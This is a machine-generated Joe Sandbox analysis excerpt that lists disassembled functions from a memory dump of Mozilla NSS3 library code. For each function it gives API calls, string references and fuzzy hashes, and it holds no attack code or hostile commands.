Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: d469df02b45c7a38946d1624ac3e4a9e66a2530f021a9dd049bccaadd6f635ca
Instruction ID: 0704bcedc5f5838a5a2cc4662b9b7ebceb1ebb36d200f9414d3ecee8d65c511b
Opcode Fuzzy Hash: d469df02b45c7a38946d1624ac3e4a9e66a2530f021a9dd049bccaadd6f635ca
Instruction Fuzzy Hash: E6B1E6B1914205DFDB20DF68DA8CAAAB7B4FF09328F104929D84567B01E739E994CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C80AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80AF39
PR_Unlock.NSS3(?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80AF69
TlsGetValue.KERNEL32 ref: 6C80B06B
EnterCriticalSection.KERNEL32(?), ref: 6C80B083
PR_Unlock.NSS3(?), ref: 6C80B0A4
TlsGetValue.KERNEL32 ref: 6C80B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C80B0D9
PR_Unlock.NSS3 ref: 6C80B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C80B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C80B182

Part of subcall function 6C83FAB0: free.MOZGLUE(?,-00000001,?,?,6C7DF673,00000000,00000000), ref: 6C83FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C80B177

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C7EAB95,00000000,?,00000000,00000000,00000000), ref: 6C80B1C2

Part of subcall function 6C831560: TlsGetValue.KERNEL32(00000000,?,6C800844,?), ref: 6C83157A
Part of subcall function 6C831560: EnterCriticalSection.KERNEL32(?,?,?,6C800844,?), ref: 6C83158F
Part of subcall function 6C831560: PR_Unlock.NSS3(?,?,?,?,6C800844,?), ref: 6C8315B2

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: a806baf5aad1f2fa1c6a9d7afa619e92fbba3c6a9f87373558a16777c3335e84
Instruction ID: 31277e1cd665be6065f34c1ecdc8bd321b53e2b1cf6cf02e99bf53e6ea0c1856
Opcode Fuzzy Hash: a806baf5aad1f2fa1c6a9d7afa619e92fbba3c6a9f87373558a16777c3335e84
Instruction Fuzzy Hash: 62A1D1B1E002069BEF209F68DE85AFA77B4BF05308F104535E909A7752E731E959CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C82E550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C82E5A0

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6C82E5F2

Strings

0, xrefs: 6C82EA4D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: ddd05b16fec52570eeb627d16cd4134cbfbad03d7918ff59c426dce9f41f919c
Instruction ID: 9d7c59a7192f8e14f83329e2504cec77be49281b29f409bf24b0af304b947ac1
Opcode Fuzzy Hash: ddd05b16fec52570eeb627d16cd4134cbfbad03d7918ff59c426dce9f41f919c
Instruction Fuzzy Hash: 1FF1ABB19002289BDB318F24CD88BDA77B5BF09319F0445A9E948A7741E778AED4CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 6C8BA4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8BA4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8BA4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8BA553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8BA5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8BA5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8BA60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8BA633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8BA671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8BA69A

Strings

%s at line %d of [%.10s], xrefs: 6C8BA62C
database corruption, xrefs: 6C8BA627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8BA61D, 6C8BA68B, 6C8BA6B3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: de81f27c0388065f5e76921af4c21219d40a82e7ee25d1ec2092e7f35e216797
Instruction ID: 7630dee6f3d6a47e93979bb5d8c45a5a8235e65cd11ac8af1e569a363d1c481f
Opcode Fuzzy Hash: de81f27c0388065f5e76921af4c21219d40a82e7ee25d1ec2092e7f35e216797
Instruction Fuzzy Hash: 7651C7B1908305ABDB21CF29DA80A9B7BE1AF4531CF044C79F89997751E731DD48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E45B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C7E1984,?), ref: 6C7E45F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7E45FB

Part of subcall function 6C840840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8408B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C7E461E

Part of subcall function 6C83FCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C7E4101,00000000,?,?,?,6C7E1666,?,?), ref: 6C83FCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C7E4646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7E4662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C7E467A
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7E4691
PL_FreeArenaPool.NSS3 ref: 6C7E46A3
PL_FinishArenaPool.NSS3 ref: 6C7E46AB
free.MOZGLUE(?), ref: 6C7E46BC
PORT_ZAlloc_Util.NSS3(?), ref: 6C7E46E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7E4717

Strings

security, xrefs: 6C7E45EC

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 1750d52cb10191c04ffa56032b19f1e943cb95f73040a5bca220ba00088a8d65
Instruction ID: 57e03fc3b571a56d66f70a7dff8a11bab905c1d062db3f9ae98b9226e9541fa0
Opcode Fuzzy Hash: 1750d52cb10191c04ffa56032b19f1e943cb95f73040a5bca220ba00088a8d65
Instruction Fuzzy Hash: 474127B3904314ABEB208BA99E45B5B77D8AF4C35CF144A38EC19A7B41F730E514C6D6

Uniqueness

Uniqueness Score: -1.00%

Function 6C85AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85ADB1

Part of subcall function 6C83BE30: SECOID_FindOID_Util.NSS3(6C7F311B,00000000,?,6C7F311B,?), ref: 6C83BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C85ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C85AE08

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C85AE25
PL_FreeArenaPool.NSS3 ref: 6C85AE63
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C85AE4D

Part of subcall function 6C764C70: TlsGetValue.KERNEL32(?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764C97
Part of subcall function 6C764C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CB0
Part of subcall function 6C764C70: PR_Unlock.NSS3(?,?,?,?,?,6C763921,6C9414E4,6C8ACC70), ref: 6C764CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85AE93
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C85AECC
PL_FreeArenaPool.NSS3 ref: 6C85AEDE
PL_FinishArenaPool.NSS3 ref: 6C85AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85AEF5
PL_FinishArenaPool.NSS3 ref: 6C85AF16

Strings

security, xrefs: 6C85ADEE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: df3b5acd8ea064072124a495317608bc7fbccc60508b5c599520bb258ec27273
Instruction ID: 00e0c31e20f81c03888a73056fa7889410d7d3ac9ef18e11b0141af3c217df4b
Opcode Fuzzy Hash: df3b5acd8ea064072124a495317608bc7fbccc60508b5c599520bb258ec27273
Instruction Fuzzy Hash: 7B4129B1A0421867EB709B189EC9BFB32A4AF4230CF904D35E914D2F81F775952886F3

Uniqueness

Uniqueness Score: -1.00%

Function 6C816500 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C816526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C816554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C816563

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C816579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C816595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C8165B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C81661A

Strings

C_EncryptFinal, xrefs: 6C816521
pulLastEncryptedPartLen = 0x%p, xrefs: 6C8165AB
(CK_INVALID_HANDLE), xrefs: 6C81655C
*pulLastEncryptedPartLen = 0x%x, xrefs: 6C816615
hSession = 0x%x, xrefs: 6C81653E, 6C81654E
pLastEncryptedPart = 0x%p, xrefs: 6C816590

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal
API String ID: 1003633598-2178457252
Opcode ID: 49c03e481fd20a2fea1acf12db03c031a3ee23d281e8284c462e7a85c08804ab
Instruction ID: ad41befb9aacc1516128f6decc438875c86a01585020837f3d7ac791bffc5c5d
Opcode Fuzzy Hash: 49c03e481fd20a2fea1acf12db03c031a3ee23d281e8284c462e7a85c08804ab
Instruction Fuzzy Hash: 9C31F431609105DFDB20AF58DE48B9A37F5FB4621DF148878E948D7E12DB30D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C7F8E22
EnterCriticalSection.KERNEL32(?), ref: 6C7F8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C7F8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C7F8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C7F8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7F8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C7F8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C7F8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C7F8F00
free.MOZGLUE(?), ref: 6C7F8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C7F8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C7F8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C7F8F5B
PR_Unlock.NSS3(?), ref: 6C7F8F72
PR_Unlock.NSS3(?), ref: 6C7F8F82

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: a7a8f2e25dbc3bd67db0514eba82f96c6fc77fd914cad062676ff109792581e9
Instruction ID: 147fba77ee8a8f007d6a97a38d3d5683c7d499d8875226768381fc18c746e4c1
Opcode Fuzzy Hash: a7a8f2e25dbc3bd67db0514eba82f96c6fc77fd914cad062676ff109792581e9
Instruction Fuzzy Hash: 845126B2E002159FE7208F29CE8496EB7B9EF46758F14453AEC289B700E731ED4687D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C81CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C81CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C81CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C81CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C81CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C81CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C81CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C81CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C81CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C81CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C81CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C81CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C81CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C81CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C81D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C81D021

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 79999b366a619090f8460d5202457b91fc88d5941b289e2829c2ab6c087f7405
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 3931A9717169313BEF2E409F5E227DE108A4B6531FF042439F90EE5BC2F689965702E5

Uniqueness

Uniqueness Score: -1.00%

Function 6C82EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C82EE0B

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C82EEE1

Part of subcall function 6C821D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C821D7E
Part of subcall function 6C821D50: EnterCriticalSection.KERNEL32(?), ref: 6C821D8E
Part of subcall function 6C821D50: PR_Unlock.NSS3(?), ref: 6C821DD3

TlsGetValue.KERNEL32 ref: 6C82EE51
EnterCriticalSection.KERNEL32(?), ref: 6C82EE65
PR_Unlock.NSS3(?), ref: 6C82EEA2
free.MOZGLUE(?), ref: 6C82EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C82EED0
PR_Unlock.NSS3(?), ref: 6C82EF48
free.MOZGLUE(?), ref: 6C82EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C82EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C82EFA4
free.MOZGLUE(?), ref: 6C82EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C82F055
free.MOZGLUE(?), ref: 6C82F060

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: f960c8a9cb258e6c5a7b1b1a48e5fe966f84ea8e4f18f58a375ac28ebec23cd1
Instruction ID: 5b6ec7270c537365d22665ab5fd3c30a741dd896bf8f79956df259e1b25811b7
Opcode Fuzzy Hash: f960c8a9cb258e6c5a7b1b1a48e5fe966f84ea8e4f18f58a375ac28ebec23cd1
Instruction Fuzzy Hash: 7881B275A00209ABDF20DFA8DD85ADE7BB5BF08319F144434E909A3B41E735E964CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C7F4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C7F4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C7F4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C7F4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C7F4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C7F4E85
DER_Encode_Util.NSS3(?,?,6C9405A4,00000000), ref: 6C7F4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C7F4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C7F4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7F4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7F4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F4FC8

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: d8bbef437dbd8519baca9c838b714b4beed618189cd2ee4360db63a3ebb48ace
Instruction ID: 46222e9e81d4ab9377b515c9b00f6aae60c932585a508319a1e522903e189f02
